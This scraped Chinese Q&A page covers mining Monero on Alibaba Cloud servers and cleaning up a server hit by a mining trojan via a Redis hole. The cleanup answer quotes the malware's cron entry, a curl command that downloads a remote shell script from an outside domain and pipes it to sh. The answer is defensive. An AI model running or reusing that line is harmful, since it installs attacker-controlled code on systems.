當前位置:首頁 » 雲伺服器 » 阿里雲伺服器挖牛肉幣

阿里雲伺服器挖牛肉幣

發布時間: 2023-09-11 18:56:38

『壹』 雲伺服器挖礦踐行 第一篇

三天以前看到壯鄉金榮仔的文章,從中了解到可以利用阿里雲伺服器進行挖礦,收益可觀,於是立即和作者進行了聯系,咨詢拜師的事情。

通過和孫師傅交流發現,因為寫作讓我們有了很多共同交流的基礎,並且我居然已經關注了孫師傅有好幾個月的時間了,這讓我們很快建立了信任。

孫師傅在文章中提到正式收徒弟還要等一段時間,我覺得這段時間也不能浪費,還應該為將來拜師以後做一點准備工作。於是我立即開始對雲服務挖礦這件事情進行了認真的思考並實踐。

雲服務挖礦的可行性,大概有這么幾個方面。

一,雲伺服器挖礦的成本收益分析。

成本構成:挖礦的成本主要有三項,礦機的支出,電費,場地及相關管理費用;

收益構成:挖礦的收益主要來自兩個方面,一是按照當前數字貨幣的法幣價格可以不管成本而獲得的收益,二是數字貨幣在未來增值獲得的收益。

分析:雲伺服器的運算能力遠遠低於實體礦機,但是不用支付電費,這是最大的成本節省,另外,由於不需要場地,自己遠程管理,場地和管理費用也趨近於零。

因此在算力有限的情況下,雲伺服器挖礦最大限度地消除了電費和場地的費用,這是這項技術的優勢所在。而盈利的平衡點,將極大的取決於伺服器費用的支出和當前幣價的相對關系。

二,雲伺服器和挖礦幣種的分析。

雲伺服器的種類有很多,主要分兩種,CPU型和GPU型。

目前市場上的各種虛擬幣演算法也分兩類,GPU友好型和CPU有好型。比特幣以太坊,萊特幣等絕大多數幣種都屬於GPU友好型,CPU友好型比較少,我了解到的只有大零幣zec,小零幣xzc,門羅幣xmr。

所以這樣一來,在伺服器和幣種的選擇問題上,方向很清晰:CPU和GPU任何一個方向,選擇算力性價比最高的雲伺服器和挖礦收益最高的幣種。

三,實踐。

李笑來的文章中提到過,任何挖礦的行為都不如直接到市場上去買來得容易。我也因此在之前的虛擬貨幣的學習中,很少關注挖礦的知識。同時對於伺服器方面的知識也了解很少,所以一開始我只能用網路上能夠搜索得到的辦法進行實踐, 以快速入門,開始積累。

網上能夠直接搜索到的就是利用CPU伺服器挖掘門羅幣。文章鏈接如下。

於是我花了391.5元購買了三個月的阿里雲輕量型伺服器,配置如下。阿里雲目前在搞活動,首單可以打七折。

開始進行實踐。

經過了兩天的折騰,終於在運行伺服器上挖礦成功,但是算力只有140h/s,在這個算力下,要虧本一半。

具體折騰的過程中,遇到坑無數,也麻煩了我搞計算機的朋友很多,這個過程留待下一篇再寫吧。

四,關於風險的思考。

目前來看,用雲伺服器挖礦伺服器的價格是預付的,並且是固定的,所以挖礦是否有收益,取決於目前的虛擬貨幣的價格。從孫師傅的截圖來看,目前收益還是很可觀的。

近期的風險來自於幣價的下跌,遠期的風險來看,就是阿里雲伺服器會禁止挖礦行為。阿里雲對於挖礦的行為,在網上有過很多的聲明。在搜索伺服器挖礦相關知識的時候,也發現有國外的伺服器禁止挖礦。

長期來看,如果目前雲伺服器挖礦不賠本那麼未來大概率是會有很大的收益的。

就在寫這一篇的過程中,孫師傅的收徒標也發出來了,很快就要收徒弟啦。我也正好把這一篇當做我第一這周的作業。

『貳』 阿里雲伺服器的cup佔用不高,都是系統操作很卡是什麼原因(主要是進入伺服器的目錄都很卡)

檢查下硬碟讀寫的IO是不是達到瓶頸 或伺服器里有無大量的讀寫操作,如果沒有的話那就要檢查下伺服器是否中了挖礦木馬了

『叄』 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top,查看了一會,沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:

View Code

解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.

『肆』 阿里雲香港伺服器國內可以訪問嗎

可以的啊,只是伺服器放在了香港而已。使用香港的伺服器主要是節省了網站備案的流程與時間,

熱點內容
滑板鞋腳本視頻 發布:2025-02-02 09:48:54 瀏覽:432
群暉怎麼玩安卓模擬器 發布:2025-02-02 09:45:23 瀏覽:557
三星安卓12彩蛋怎麼玩 發布:2025-02-02 09:44:39 瀏覽:743
電腦顯示連接伺服器錯誤 發布:2025-02-02 09:24:10 瀏覽:536
瑞芯微開發板編譯 發布:2025-02-02 09:22:54 瀏覽:146
linux虛擬機用gcc編譯時顯示錯誤 發布:2025-02-02 09:14:01 瀏覽:232
java駝峰 發布:2025-02-02 09:13:26 瀏覽:651
魔獸腳本怎麼用 發布:2025-02-02 09:10:28 瀏覽:532
linuxadobe 發布:2025-02-02 09:09:43 瀏覽:212
sql2000資料庫連接 發布:2025-02-02 09:09:43 瀏覽:726